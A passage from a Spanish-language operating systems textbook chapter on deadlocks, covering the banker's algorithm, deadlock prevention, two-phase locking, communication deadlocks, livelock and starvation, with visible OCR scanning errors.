C 

2 

7 


Libres: 4 
(d) 


En un momento dado, B se completará y llegaremos a la situación de la figura 6-10(d). En 
este punto estamos atorados. Sólo tenemos cuatro instancias del recurso libres, y cada uno de los 
procesos activos necesita cinco. No hay una secuencia que garantice que los procesos se comple¬ 
tarán. A sí, la decisión de asignación que cambió al sistema de la figura 6-10(a) a la figura 6-10(b) 
pasó de un estado seguro a uno inseguro. Tampoco funciona si ejecutamos A o C a continuación, 
empezando en la figura 6-10(b). En retrospectiva, la petición de A no debería haberse otorgado. 

Vale la pena observar que un estado inseguro no es un estado en interbloqueo. Empezando en 
la figura 6-10(b), el sistema puede ejecutarse durante cierto tiempo. De hecho, hasta un proceso se 
puede completar. Además es posible que A libere un recurso antes de pedir más, con lo cual C se 
podría completar y se evitaría el interbloqueo por completo. Por ende, la diferencia entre un estado 
seguro y uno inseguro es que, desde un estado seguro, el sistema puede garantizar que todos los 
procesos terminarán; desde un estado inseguro, no se puede dar esa garantía. 


6.5.3 El algoritmo del banquero para un solo recurso 

Dijkstra (1965) ideó un algoritmo de programación que puede evitar interbloqueos: este algoritmo 
se conoce como el algoritmo del banquero y es una extensión del algoritmo de detección de inter¬ 
bloqueos que se proporciona en la sección 3.4.1. Se modela de la forma en que un banquero de una 
pequeña ciudad podría tratar con un grupo de clientes a los que ha otorgado líneas de crédito. Lo 
que hace el algoritmo es comprobar si al otorgar la petición se produce un estado inseguro. Si es 
así, la petición se rechaza. Si al otorgar la petición se produce un estado seguro, se lleva a cabo. En 
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la figura 6-ll(a) podemos ver cuatro clientes, A, B, C y D, cada uno de los cuales ha recibido un 
cierto número de unidades de crédito (por ejemplo, 1 unidad es IK dólares). El banquero sabe que 
no todos los el i entes necesitan su crédito máximo de inmediato, por lo que ha reservado sólo 10 uni¬ 
dades en vez de 22 para darles servicio (en esta analogía, los clientes son procesos, las unidades 
son, por ejemplo, unidades de cinta, y el banquero es el sistema operativo). 
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(a) (b) (c) 

Figura 6-11. Tres estados de asignación de recursos: (a) Seguro, (b) Seguro, (c) In¬ 
seguro. 


Los clientes hacen sus respectivas labores, pidiendo préstamos de vez en cuando (es decir, so¬ 
licitando recursos). En cierto momento, la situación es como se muestra en la figura 6-ll(b). Este 
estado es seguro debido a que, con dos unidades restantes, el banquero puede retrasar cualquier pe¬ 
tición excepto la de C, con lo cual deja que C termine y libere todos sus cuatro recursos. Con cua¬ 
tro unidades a la mano, el banquero puede dejar que D o B tengan las unidades necesarias, y así en 
lo sucesivo. 

Considere lo que ocurriría si se otorgara una petición de B por una o más unidades en la figu¬ 
ra 6-ll(b). Tendríamos la situación de la figura 6-ll(c), que es insegura. Si todos los clientes pidie¬ 
ran de manera repentina sus préstamos máximos, el banquero no podría satisfacer a ninguno de 
ellos, y tendríamos un interbloqueo. Un estado inseguro no tiene que conducir a un interbloqueo, 
ya que un cliente tal vez no necesitaría toda la línea de crédito disponible, pero el banquero no po¬ 
dría contar con este comportamiento. 

El algoritmo del banquero considera cada petición a medida que va ocurriendo, y analiza si al 
otorgarla se produce un estado seguro. Si es así, se otorga la petición; en caso contrario, se pospo¬ 
ne hasta más tarde. Para ver si un estado es seguro, el banquero comprueba si tiene los suficientes 
recursos para satisfacer a algún cliente. De ser así, se asume que esos préstamos volverán a pagar¬ 
se y ahora se comprueba el cliente más cercano al límite, etcétera. Si todos los préstamos se pue¬ 
den volver a pagar en un momento dado, el estado es seguro y la petición inicial se puede otorgar. 


6.5.4 EI algoritmo del banquero para varios recursos 

El algoritmo del banquero se puede generalizar para manejar varios recursos. La figura 6-12 mues¬ 
tra cómo funciona. 

En la figura 6-12 se muestran dos matrices. La de la izquierda muestra cuántas instancias de 
cada recurso están asignadas en un momento dado a cada uno de los cinco procesos. La matriz 
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Recursos asignados Recursos que aún se necesitan 
Figura 6-12. El algoritmo del banquero con varios recursos. 


de la derecha muestra cuántos recursos sigue necesitando cada proceso para poder completarse. Es¬ 
tas matrices son sólo C y R de la figura 6-6. AI igual que en el caso con un solo recurso, los proce¬ 
sos deben declarar sus necesidades totales de recursos antes de ejecutarse, por lo que el sistema 
puede calcular la matriz derecha en cada instante. 

Los tres vectores a la derecha de la figura muestran los recursos existentes (E), los recursos po¬ 
seídos (P) y los recursos disponibles (A), respectivamente. De E podemos ver que el sistema tiene 
seis unidades de cinta, tres trazadores, cuatro impresoras y dos unidades de CD-ROM . De éstos, ya 
hay asignados cinco unidades de cinta, tres trazadores, dos impresoras y dos unidades de CD-ROM . 
Este hecho puede verse al agregar las cuatro columnas de recursos en la matriz izquierda. El vector 
de recursos disponibles es simplemente la diferencia entre lo que tiene el sistema y lo que está en 
uso en un momento dado. 

A hora se puede declarar el algoritmo para comprobar si un estado es seguro. 

1. B uscar una fila R, cuyas necesidades de recursos no satisfechas sean menores o iguales que 
A. Si no existe dicha fila, el sistema entrará en interbloqueo en un momento dado, debido a 
que ningún proceso se podrá ejecutar hasta completarse (suponiendo que los procesos man¬ 
tienen todos los recursos hasta que terminan). 

2. Suponer que el proceso seleccionado de la fila solicita todos los recursos que necesita (lo 
que se garantiza que es posible) y termina. M arcar ese proceso como terminado y agregar 
todos sus recursos al vector A. 

3. Repetir los pasos 1 y 2 hasta que todos los procesos se marquen como terminados (en cuyo 
caso el estado inicial era seguro) o hasta que no haya ningún proceso cuyas necesidades de 
recursos se puedan satisfacer (en cuyo caso hay un interbloqueo). 

Si hay varios procesos que pueden elegirse en el paso 1, no importa cuál esté seleccionado: la re¬ 
serva de recursos disponibles aumentará, o en el peor caso, permanecerá igual. 
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Ahora regresemos al ejemplo de la figura 6-12. El estado actual es seguro. Suponga que el proceso 
B ahora pídela impresora. Esa petición puede otorgarse debido a que el estado resultante es aún se¬ 
guro (el proceso D puede terminar, y después los procesos A o E, seguidos por el resto). 

Ahora imagine que después de otorgar a B una de las dos impresoras restantes, E quiere la úl¬ 
tima impresora. Al otorgar esa petición se reduciría el vector de recursos disponibles a (1 0 0 0), lo 
cual produce un interbloqueo. Es evidente que la petición de E se debe diferir por unos momentos. 

El algoritmo del banquero fue publicado por primera vez por Dijkstra en 1965. Desde enton¬ 
ces, casi todos los libros sobre sistemas operativos lo han descrito con detalle. Se han escrito innu¬ 
merables artículos sobre varios aspectos de él. Por desgracia, pocos autores han tenido la audacia 
de recalcar que, aunque en teoría el algoritmo es maravilloso, en la práctica es en esencia inútil, de¬ 
bido a que los procesos raras veces saben de antemano cuáles serán sus máximas necesidades de re¬ 
cursos. Además, el número de procesos no está fijo, sino que varía en forma dinámica a medida que 
los nuevos usuarios inician y cierran sesión. Por otro lado, los recursos que se consideraban dispo¬ 
nibles pueden de pronto desvanecerse (las unidades de cinta se pueden descomponer). Por ende, en 
la práctica pocos (si acaso) sistemas existentes utilizan el algoritmo del banquero para evitar inter¬ 
bloqueos. 

6.6 CÓMO PREVENIR INTERBLOQUEOS 

Habiendo visto que evitar los interbloqueos es algo en esencia imposible, debido a que se requiere 
información sóbrelas peticiones futuras, que no se conocen, ¿cómo evitan los sistemas reales el in¬ 
terbloqueo? La respuesta es volver a las cuatro condiciones establecidas por Coffman y colabora¬ 
dores (1971) para ver si pueden proporcionarnos una pista. Si podemos asegurar que por lo menos 
una de estas condiciones nunca se cumpla, entonces los interbloqueos serán estructural mente impo¬ 
sibles (H avender, 1968). 

6.6.1 Cómo atacar la condición de exclusión mutua 

Primero vamos a atacar la condición de exclusión mutua. Si ningún recurso se asignara de manera 
exclusiva a un solo proceso, nunca tendríamos interbloqueos. No obstante, es igual de claro que al 
permitir quedos procesos escriban en la impresora al mismo tiempo se producirá un caos. Al colo¬ 
car la salida de la impresora en una cola de impresión, varios procesos pueden generar salida al mis¬ 
mo tiempo. En este modelo, el único proceso que realmente solicita la impresora física es el 
demonio de impresión. Como el demonio nunca solicita ningún otro recurso, podemos eliminar 
el interbloqueo para la impresora. 

Si el demonio se programa para imprimir aún y cuando toda la salida esté en una cola de im¬ 
presión, la impresora podría permanecer inactiva si un proceso de salida decide esperar varias ho¬ 
ras después de la primera ráfaga de salida. Por esta razón, los demonios comúnmente se programan 
para imprimirse sólo hasta después que esté disponible el archivo de salida completo. Sin embargo, 
esta decisión en sí podría provocar un interbloqueo. ¿Qué ocurriría si dos procesos llenaran cada 
uno una mitad del espacio de la cola de impresión disponible con datos de salida y ninguno termi¬ 
nara de producir su salida completa? En este caso tendríamos dos procesos en los que cada uno ha 
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terminado una parte, pero no toda su salida, y no pueden continuar. Ninguno de los procesos termi¬ 
nará nunca, por lo que tenemos un interbloqueo en el disco. 

Sin embargo, hay un germen de una idea aquí, que se aplica con frecuencia: evite asignar un 
recurso cuando no sea absolutamente necesario, y trate de asegurarse que la menor cantidad posi¬ 
ble de procesos reclamen ese recurso. 

6.6.2 Cómo atacar la condición de contención y espera 

La segunda condición establecida por Coffman y colaboradores se ve un poco más prometedora. Si 
podemos evitar que los procesos que contienen recursos esperen por más recursos, podemos elimi¬ 
nar los interbloqueos. Una forma de lograr esta meta es requerir que todos los procesos soliciten to¬ 
dos sus recursos antes de empezar su ejecución. Si todo está disponible, al proceso se le asignará lo 
que necesite y podrá ejecutarse hasta completarse. Si uno o más recursos están ocupados, no se asig¬ 
nará nada y el proceso sólo esperará. 

Un problema inmediato con este método es que muchos procesos no saben cuántos recursos 
necesitarán hasta que hayan empezado a ejecutarse. De hecho, si lo supieran se podría utilizar el 
algoritmo del banquero. Otro problema es que los recursos no se utilizarán de una manera óptima 
con este método. Tome como ejemplo un proceso que lee datos de una cinta de entrada, los anali¬ 
za por una hora y después escribe en una cinta de salida y traza los resultados. Si todos los recur¬ 
sos se deben solicitar de antemano, el proceso ocupará la unidad de cinta de salida y el trazador 
por una hora. 

Sin embargo, algunos sistemas de procesamiento por lotes de mainframes requieren que el 
usuario liste todos los recursos en la primera línea de cada trabajo. Después el sistema adquiere to¬ 
dos los recursos de inmediato, y los mantiene hasta que el trabajo termina. Aunque este método im¬ 
pone una carga sobre el programador y desperdicia recursos, evita los interbloqueos. 

U na manera ligeramente distinta de romper la condición de contención y espera es requerir que 
un proceso que solicita un recurso libere temporal mente todos los recursos que contiene en un mo¬ 
mento dado. Después puede tratar de obtener todo lo que necesite a la vez. 

6.6.3 Cómo atacar la condición no apropiativa 

También es posible atacar la tercera condición (no apropiativa). Si a un proceso se le ha asignado 
la impresora y está a la mitad de imprimir su salida, quitarle la impresora a la fuerza debido a que 
el trazador que necesita no está disponible es algo engañoso como máximo, e imposible en el peor 
caso. Sin embargo, ciertos recursos se pueden virtualizar para evitar esta situación. Al colocar en 
una cola de impresión en el disco la salida de la impresora y permitir que sólo el demonio de im¬ 
presión tenga acceso a la impresora real, se eliminan los interbloqueos que involucran a la impre¬ 
sora, aunque se crea uno para el espacio en disco. No obstante, con los discos grandes es muy 
improbable quedarse sin espacio. 

Sin embargo, no todos los recursos se pueden virtualizar de esta manera. Por ejemplo, los re¬ 
gistros en las bases de datos o las tablas dentro del sistema operativo se deben bloquear para poder 
utilizarse, y ahí es donde se encuentra el potencial para el interbloqueo. 
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6.6.4 C ómo atacar la condición de espera circular 

Sólo queda una condición. La espera circuiar se puede eiiminar de varias formas. Una de eiias es 
simpiemente tener una regia que diga que un proceso tiene derecho sóio a un recurso en cuaiquier 
momento. Si necesita un segundo recurso, debe iiberar ei primero. Para un proceso que necesita co¬ 
piar un enorme archivo de una cinta a una impresora, esta restricción es inaceptabie. 

Otra manera de evitar ia espera circuiar es proporcionar una numeración giobai de todos ios re¬ 
cursos, como se muestra en ia figura 6-13(a). Ahora ia regia es ésta: ios procesos pueden soiicitar 
recursos cada vez que quieran, pero todas ias peticiones se deben reaiizar en orden numérico. Un 
proceso puede pedir primero una impresora y después una unidad de cinta, pero tai vez no pueda 
pedir primero un trazador y después una impresora. 


1. Fotocomponedora 

2. Escáner 

3. Trazador 

4. Unidad de cinta 

5. Unidad de CD-ROM 



(a) 


(b) 


Figura 6-13. (a) Recursos ordenados en forma numérica, (b) U n gráfico de recursos. 


Con esta regia, ei gráfico de asignación de recursos nunca puede tener cicios. Veamos por qué 
es esto cierto para ei caso de dos procesos, en ia figura 6-13(b). Podemos obtener un interbioqueo 
sóio si A soiicita ei recurso j y B soiicita ei recurso i. Suponiendo que i y j sean recursos distintos, 
tendrán diferentes números. Si i > j, entonces A no puede soiicitar a j debido a que es menor de io 
que ya tiene. Si i <j, entonces B no puede soiicitar a i debido a que es menor de io que ya tiene. De 
cuaiquier forma, ei interbioqueo es imposibie. 

Con más de dos procesos se apiica i a misma iógica. En cada instante, uno de ios recursos asig¬ 
nados será ei más aito. Ei proceso que contiene ese recurso nunca pedirá un recurso que ya esté 
asignado. Terminará o, en ei peor caso, soiicitará recursos con mayor numeración, ios cuaies es¬ 
tán disponibies. En un momento dado, terminará y iiberará sus recursos. En este punto, aigún otro 
proceso contendrá ei recurso más aito y también podrá terminar. En resumen, existe un escenario 
en ei que todos ios procesos terminan, por io que no hay interbioqueo presente. 

Una variación menor de este aigoritmo es retirar ei requerimiento de que ios recursos se ad¬ 
quieran en una secuencia cada vez más estricta, y simpiemente insistir que ningún proceso puede 
soiicitar un recurso menor dei que ya contiene. Si ai principio un proceso soiicita 9 y 10, y después 
iibera ambos recursos, en efecto está empezando otra vez, por io que no hay razón deprohibirieque 
soi icite ei recurso 1. 

Aunque ei ordenamiento numérico de ios recursos eiimina ei probiema de ios interbioqueos, 
puede ser imposibie encontrar un ordenamiento que satisfaga a todos. Cuando ios recursos inciu- 
yen entradas en ia tabia de procesos, espacio en ia coia de impresión dei disco, registros bioquea- 
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dos de la base de datos y otros recursos abstractos, el número de recursos potenciales y usos distin¬ 
tos puede ser tan grande que ningún ordenamiento podría funcionar. 

Los diversos métodos para evitar el interbloqueo se sintetizan en la figura 6-14. 


Condición 

Método 

Exclusión mutua 

Poner todo en la cola de impresión 

Contención y espera 

Solicitar todos los recursos al principio 

No apropiativa 

Quitar los recursos 

Espera circular 

Ordenar los recursos en forma numérica 


Figura 6-14. Resumen de los métodos para evitar interbloqueos. 


6.7 OTRAS CUESTIONES 

En esta sección analizaremos varias cuestiones relacionadas con los interbloqueos. Éstas incluyen 
el bloqueo de dos fases, los interbloqueos sin recursos y la inanición. 


6.7.1 Bloqueo de dos fases 

Aunque los métodos para evitar y prevenir los interbloqueos no son muy prometedores en el ca¬ 
so general, para aplicaciones específicas se conocen muchos algoritmos excelentes de propósito 
especial. Como ejemplo, en muchos sistemas de bases de datos, una operación que ocurre con 
frecuencia es solicitar bloqueos sobre varios registros y después actualizar todos los registros blo¬ 
queados. Cuando hay varios procesos en ejecución al mismo tiempo, hay un peligro real de in¬ 
terbloqueo. 

A menudo, a este método se le conoce como bloqueo de dos fases. En la primera fase, el pro¬ 
ceso trata de bloquear todos los registros que necesita, uno a la vez. Si tiene éxito pasa a la segun¬ 
da fase, realizando sus actualizaciones y liberando los bloqueos. No se realiza ningún trabajo real 
en la primera fase. 

Si durante la primera fase se necesita cierto registro que ya esté bloqueado, el proceso sólo li¬ 
bera todos sus bloqueos e inicia la primera fase desde el principio. En cierto sentido este método 
es similar a solicitar todos los recursos que necesita de antemano, o al menos antes de realizar al¬ 
go irreversible. En ciertas versiones del bloqueo de dos fases, no hay liberación y reinicio si se en¬ 
cuentra un registro bloqueado durante la primera fase. En estas versiones puede ocurrir un 
interbloqueo. 

Sin embargo, esta estrategia no es aplicable en general. Por ejemplo, en los sistemas de tiem¬ 
po real y los sistemas de control de procesos, no es aceptable sólo terminar un proceso a la mitad 
debido a que un recurso no está disponible, y empezar todo de nuevo. Tampoco es aceptable iniciar 
de nuevo si el proceso ha leído o escrito mensajes en la red, actualizado archivos o cualquier otra 
cosa que no se pueda repetir con seguridad. El algoritmo funciona sólo en aquellas situaciones en 








458 


INTERBLOQUEOS 


CAPITULO 6 


donde el programador ha ordenado las cosas con mucho cuidado, para que el programa se pueda 
detener en cualquier punto durante la primera fase y luego se reinicie. M uchas aplicaciones no se 
pueden estructurar de esta forma. 

6.7.2 I nterbioqueos de comunicaciones 

Hasta ahora, todo nuestro trabajo se ha concentrado en los interbloqueos de recursos. Un proceso 
desea algo que otro proceso tiene, y debe esperar a que el primero lo libere. Algunas veces los re¬ 
cursos son objetos de hardware o de software, como las unidades de CD-ROM o los registros de 
bases de datos, pero algunas veces son más abstractos. En la figura 6-2 vimos un interbloqueo 
de recursos, en donde los recursos eran mutexes. Esto es un poco más abstracto que una unidad de 
CD-ROM , pero en este ejemplo, cada proceso adquirió con éxito un recurso (uno de los mutexes) 
y entró en un interbloqueo tratando de adquirir otro (el otro mutex). Esta situación es un interblo¬ 
queo de recursos clásico. 

Sin embargo, como dijimos al inicio del capítulo, aunque los interbloqueos de recursos son el 
tipo más común, no son el único. Otro tipo de interbloqueo puede ocurrir en los sistemas de comu¬ 
nicaciones (como las redes), en donde dos o más procesos se comunican mediante el envío de men¬ 
sajes. Un arreglo común es que el proceso A envía un mensaje de petición al proceso B, y después 
se bloquea hasta que B envía de vuelta un mensaje de respuesta. Suponga que el mensaje de peti¬ 
ción se pierde. A se bloquea en espera de la respuesta. B se bloquea en espera de una petición para 
que haga algo. Tenemos un interbloqueo. 

Sólo que éste no es el clásico interbloqueo de recursos. A no está en posesión de un recurso que 
B quiere, ni viceversa. De hecho, no hay recursos a la vista. Pero es un interbloqueo de acuerdo con 
nuestra definición formal, ya que tenemos un conjunto de (dos) procesos, cada uno bloqueado en 
espera de un evento que sólo el otro puede provocar. A esta situación se le conoce como interblo¬ 
queo de comunicación, para contrastarlo con el interbloqueo de recursos más común. 

Los interbloqueos de comunicación no se pueden evitar mediante el ordenamiento de recursos 
(ya que no hay ninguno), ni se puede evitar mediante una programación cuidadosa (ya que no hay 
momentos en los que se puede posponer una petición). Por fortuna hay otra técnica que por lo ge¬ 
neral se puede utilizar para romper los interbloqueos de comunicación: los tiempos de espera. En la 
mayoría de los sistemas de comunicación de red, cada vez que se envía un mensaje del que se es¬ 
pera una respuesta, también se inicia un temporizador. Si el temporizador termina su conteo antes 
deque llegue la respuesta, el emisor del mensaje asume que éstese ha perdido y lo envía de nuevo 
(una y otra vez, si es necesario). De esta forma se evita el interbloqueo. 

Desde luego que, si el mensaje original no se perdió pero la respuesta simplemente se retrasó, 
el receptor destinado puede recibir el mensaje dos o más veces, tal vez con consecuencias indesea¬ 
bles. Piense en un sistema bancario electrónico en el que el mensaje contiene instrucciones para rea¬ 
lizaron pago. Es evidente que no se debe repetir (y ejecutar) vari as veces, sólo porque la red es lenta 
o el tiempo de espera es demasiado corto. El diseño de las reglas de comunicación para que todo 
funcione bien, que se conocen como protocolo, es un tema complejo y muy alejado del alcance de 
este libro. A los lectores interesados en los protocolos de red podría interesarles otro libro escrito 
por el autor, Computer Networks (Tanenbaum, 2003). 
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No todos los interbloqueos ocurren en los sistemas de comunicaciones, ni todas las redes son 
interbloqueos de comunicación. A quí también pueden ocurrir interbloqueos de recursos. Por ejem¬ 
plo, considere la red de la figura 6-15. Esta figura es una vista simplificada de Internet. M uy sim¬ 
plificada. Internet consiste en dos tipos de computadoras: hosts (servidores) y enrutadores. Un 
host es una computadora de usuario, ya sea la PC de alguien en su hogar, una PC en una empresa 
o un servidor corporativo. Los hosts funcionan para las personas. Un enrutador es una compu¬ 
tadora de comunicaciones especializada que desplaza paquetes de datos desde el origen hasta el 
destino. Cada host está conectado a uno o más enrutadores, ya sea mediante una línea DSL, cone¬ 
xión de TV por cable, LAN, línea de marcación telefónica, red inalámbrica, fibra óptica o algo 
más. 



Figura 6-15. U n interbloqueo de recursos en una red. 


Cuando llega un paquete a un enrutador proveniente de uno de sus hosts, se coloca en un bú- 
fer para transmitirlo a continuación a otro enrutador, y después a otro hasta que llega al destino. Es¬ 
tos búferes son recursosy hay un número finito de ellos. En lafigura 6-15, cada enrutador sólotiene 
ocho búferes (en la práctica tienen millones, pero eso no cambia la naturaleza del interbloqueo po¬ 
tencial, sólo su frecuencia). Suponga que todos los paquetes en el enrutador A necesitan ir a B, que 
todos los paquetes en B necesitan ir a C, que todos los paquetes en C necesitan ir a D y todos los 
paquetes en D necesitan ir a A. Ningún paquete se puede mover debido a que no hay búfer al otro 
extremo y tenemos un interbloqueo de recursos clásico, aunque a la mitad de un sistema de comu¬ 
nicaciones. 


6.7.3 Bloqueo activo 

En ciertas situaciones se utiliza el sondeo (ocupado en espera). Esta estrategia se utiliza a menudo 
cuando se va a usar la exclusión mutua por un tiempo muy corto, y la sobrecarga de la suspensión 
es grande en comparación con realizar el trabajo. Considere una primitiva atómica en la que el pro¬ 
ceso que llama prueba un mutex y lo sostiene o devuelve una falla. 
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Ahora imagine un par de procesos que utiiizan dos recursos, como se muestra en ia figura 
6-16. Cada uno necesita dos recursos y ambos utiiizan ia primitiva de sondeo entrar_region para 
tratar de adquirir ios bioqueos necesarios. Si faiia ei intento, ei proceso sóio intenta otra vez. En ia 
figura 6-16, si ei proceso A se ejecuta primero y adquiere ei recurso 1, y después se ejecuta ei pro¬ 
ceso 2 y adquiere ei recurso 2, sin importar quién se ejecute a continuación, no progresará más, pe¬ 
ro ninguno de ios procesos se bioqueará. Sóio utiiiza su quantum de CPU una y otra vez sin 
progresar, pero sin bioquearse tampoco. Por ende, no tenemos un interbioqueo (debido a que nin¬ 
gún proceso está bioqueado), pero tenemos aigofuncionaimenteequivaiente ai interbioqueo: ei blo¬ 
queo activo (iiveiock). 


void proceso_A{void) { 
entrar_region{&recurso_l); 
entrar_region{&recurso_2); 
usar_ambos_recursos(); 
salir_region{6irecurso_2); 
salir_region{6irecurso_l); 

} 

void proceso_B{void) { 
entrar_region{&recurso_2); 
entrar_region{&recurso_l); 
usar_ambos_recursos(); 
salir_region{Sirecurso_l); 
salir_region{6irecurso_2); 

} 


Figura 6-16. El estado de ocupado en espera puede conducir al bloqueo activo. 

Ei bioqueo activo puede ocurrir en formas sorprendentes. En aigunos sistemas, ei número to- 
tai de procesos permitidos se determina con base en ei número de entradas en i a tabia de procesos. 
Así, ias entradas de ia tabia de procesos son recursos finitos. Si una operación fork faiia debido a 
que ia tabia está iiena, un método razonabie para ei programa que reaiiza ia operación fonk es es¬ 
perar un tiempo aieatorio y probar de nuevo. 

A hora suponga que un sistema UNIX tiene 100 entradas de procesos. Se ejecutan diez progra¬ 
mas, cada uno de ios cuaies necesita crear 12 (sub)procesos. Una vez que cada proceso ha creado 
9 procesos, ios 10 procesos originaies y ios 90 procesos nuevos han agotado ia tabia. Cada uno de 
ios 10 procesos originaies ahora se encuentra en un cicio sin fin, bifurcando y faiiando: un interbio¬ 
queo. La probabiiidad de que esto ocurra es minúscuia, pero podría ocurrir. ¿Debemos abandonar 
ios procesos y ia iiamada a fork para eiiminarei probiema? 

Ei número máximo de archivos abiertos está restringido de manera simiiar por ei tamaño de ia 
tabia de nodos-i, por io que ocurre un probiema simiiar cuando se iiena. Ei espacio de intercambio 
en ei disco es otro recurso iimitado. De hecho, casi todas ias tabias en ei sistema operativo repre¬ 
sentan un recurso finito. ¿Debemos aboiir todo esto debido a que podría ocurrir que una coiección 
de n procesos podrían reciamar cada uno 1/n dei totai, y después tratar de reciamarse unos a otros? 
Probabiemente no sea una buena idea. 
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La mayoría de los sistemas operativos, inciuyendo UNIX y Windows, sóio ignoran ei probie- 
ma con base en ia suposición de que ia mayoría de ios usuarios preferirían un bioqueo activo oca- 
sionai (o inciuso un interbioqueo) en vez de una regia que restrinja a todos ios usuarios a un soio 
proceso, un soio archivo abierto, y sóio una cosa de todo. Si estos probiemas se pudieran eiiminar 
sin costo, no habría mucha discusión. Ei probiema esqueei precio esaito, en su mayor parteen tér¬ 
minos de imponer restricciones inconvenientes en ios procesos. Por io tanto, nos enfrentamos a una 
concesión desagradabie entre io conveniente y io correcto, y con una gran discusión sobre io que es 
más importante, y para quién. 

Vaie ia pena mencionar queaigunas personas no hacen una distinción entre ia inanición y ei in¬ 
terbioqueo, ya que en ambos casos no hay un progreso positivo. Otras sienten que son fundamen- 
taimente distintos, ya que un proceso podría programarse fáciimente para tratar de hacer aigo n 
veces y, si todo faiiara, probar otra cosa. U n proceso bioqueado no tiene esa opción. 

6.7.4 Inanición 

Un probiema muy reiacionado con ei interbioqueo y ei bioqueo activo es ia inanición. En un siste¬ 
ma dinámico, ias peticiones de recursos ocurren todo ei tiempo. Se necesita cierta poiítica para deci¬ 
dir acerca de quién obtiene qué recurso y cuándo. Esta poiítica, aunque parece razonabie, puede 
ocasionar que ciertos procesos nunca reciban atención, aun cuando no estén en interbioqueo. 

Como ejempio, considere ia asignación de ia impresora. Imagine que ei sistema utiiiza cierto 
aigoritmo para asegurar que ia asignación de ia impresora no produzca un interbioqueo. Ahora su¬ 
ponga que varios procesos ia quieren ai mismo tiempo. ¿Quién debe obteneria? 

Un posibie aigoritmo de asignación es otorgar ia impresora ai proceso con ei archivo más pe¬ 
queño a imprimir (suponiendo que esta información esté disponibie). Este método maximiza ei nú¬ 
mero de Chentes satisfechos y parece razonabie. Ahora considere io que ocurre en un sistema 
ocupado, cuando un proceso tiene que imprimir un archivo enorme. Cada vez que ia impresora es¬ 
té iibre, ei sistema buscará y eiegirá ei proceso con ei archivo más pequeño. Si hay un fiujo cons¬ 
tante de procesos con archivos cortos, ei proceso con ei archivo enorme nunca recibirá ia impresora. 
Simpiemente se pospondrá de manera indefinida, aun cuando no está bioqueado. 

La inanición se puede evitar mediante ei uso de una poiítica de asignación de recursos dei tipo 
"primero en iiegar, primero en ser atendido". Con este método, ei proceso que espere más tiempo se¬ 
rá ei que se atienda primero. A su debido tiempo, cuaiquier proceso dado se convertirá en ei más 
antiguo y, por ende, obtendrá ei recurso que necesita. 


6.8 INVESTIGACIÓN SOBRE LOS INTERBLOQUEOS 

Si aiguna vez existió un tema que se investigara sin misericordia durante ios primeros días de ios 
sistemas operativos, fue ei de ios interbioqueos. La razón de eiio es que ia detección de interbio- 
queos es un pequeño y agradabie probiema de teoría de gráficos, que un estudiante graduado con 
inciinaciones matemáticas podría estar digiriendo por 3 o 4 años. Se idearon todo tipo de aigorit- 
mos, cada uno más exótico y menos práctico que ei anterior. La mayor parte de ese trabajo ha de¬ 
saparecido, pero aún hay artícuiosquese pubiican sobre varios aspectos de ios interbioqueos. Estos 
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incluyen la detección en tiempo de ejecución de los interbloqueos ocasionados por el uso incorrec¬ 
to de los bloqueos y los semáforos (AgarwaI y Stoller, 2006; Bensaiem y colaboradores, 2006), evi¬ 
tar los interbloqueos entre los hilos de java (Permandia y colaboradores, 2007; Williams y 
colaboradores, 2005), lidiar con interbloqueos en redes (jayasimha, 2003; Karol y colaboradores, 
2003; Schafery colaboradores, 2005), el modelado de interbloqueos en sistemas de flujos de datos 
(Zhou y Lee, 2006), y la detección de interbloqueos dinámicos (Li y colaboradores, 2005). Levine 
(2003a, 2003b) comparó distintas definiciones (a menudo contradictorias) de los interbloqueos en 
la literatura, e ideó un esquema de clasificación para ellos. También hizo otro análisis déla diferen¬ 
cia entre prevenir los interbloqueos y evitarlos (Levine, 2005). También se estudian los métodos pa¬ 
ra recuperarse de los interbloqueos (David y colaboradores, 2007). 

Además, hay algo de investigación (teórica) sobre la detección de interbloqueos distribuidos. 
No trataremos eso aquí debido a que 1) está fuera del alcance de este libro y 2) nada de esto es si¬ 
quiera remotamente práctico en los sistemas reales. Su función principal parece ser mantener a los 
teorizadores de gráficos desempleados fuera de las calles. 


6.9 RESUMEN 

El interbloqueo es un problema potencial en cualquier sistema operativo. Ocurre cuando todos los 
miembros de un conjunto de procesos se bloquean en espera de un evento que sólo otros miembros 
del conjunto pueden ocasionar. Esta situación hace que todos los procesos esperen para siempre. 
Comúnmente, el evento que los procesos esperan es la liberación de algún recurso contenido por 
otro miembro del conjunto. Otra situación en la que es posible el interbloqueo se da cuando un con¬ 
junto de procesos de comunicación están a la espera de un mensaje, y el canal de comunicación es¬ 
tá vacío sin que haya tiempos de espera pendientes. 

El interbloqueo de recursos se puede evitar al llevar la cuenta de cuáles estados son seguros y 
cuáles son inseguros. Un estado seguro es uno en el que existe una secuencia de eventos que garan¬ 
tizan que todos los procesos pueden terminar; un estado inseguro no tiene dicha garantía. El algo¬ 
ritmo del banquero evita el interbloqueo al no otorgar una petición si ésta colocará al sistema en un 
estado inseguro. 

El interbloqueo de recursos se puede prevenir estructural mente, al construir el sistema de tal 
forma que nunca pueda ocurrir por diseño. Por ejemplo, al permitir que un proceso contenga sólo 
un recurso en cualquier instante se rómpela condición de espera circular requerida para el interblo¬ 
queo. El interbloqueo de recursos también se puede prevenir al enumerar todos los recursos, y ha¬ 
cer que los procesos los soliciten en orden estrictamente ascendente. 

El interbloqueo de recursos no es el único tipo de interbloqueo. El interbloqueo de comunica¬ 
ción también es un problema potencial en algunos sistemas, aunque a menudo se puede manejar 
mediante el establecimiento de tiempos de espera apropiados. 

El bloqueo activo es similar al interbloqueo, en cuanto a que puede detener todo el progreso 
positivo, pero es técnicamente diferente ya que involucra procesos que en realidad no están blo¬ 
queados. La inanición se puede evitar mediante una política de asignación del tipo "primero en lle¬ 
gar, primero en ser atendido". 
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PROBLEMAS 

1. Proporcione un ejemplo de un interbloqueo tomado de las políticas. 

2. Los estudiantes que trabajan en PCs individuales en un laboratorio de computadoras envían sus ar¬ 
chivos para que los imprima un servidor que coloca los archivos en una cola de impresión en su dis¬ 
co duro. ¿Bajo qué condiciones puede ocurrir un interbloqueo, si el espacio en disco para la cola de 
impresión está limitado? ¿Cómo puede evitarse el interbloqueo? 

3. En la figura 6-1 los recursos se devuelven en el orden inverso de su adquisición. ¿Sería igual de con¬ 
veniente devolverlos en el otro orden? 

4. Las cuatro condiciones (exclusión mutua, contención y espera, no apropiativo y espera circular) son 
necesarias para que ocurra un interbloqueo de recursos. Proporcione un ejemplo para mostrar que 
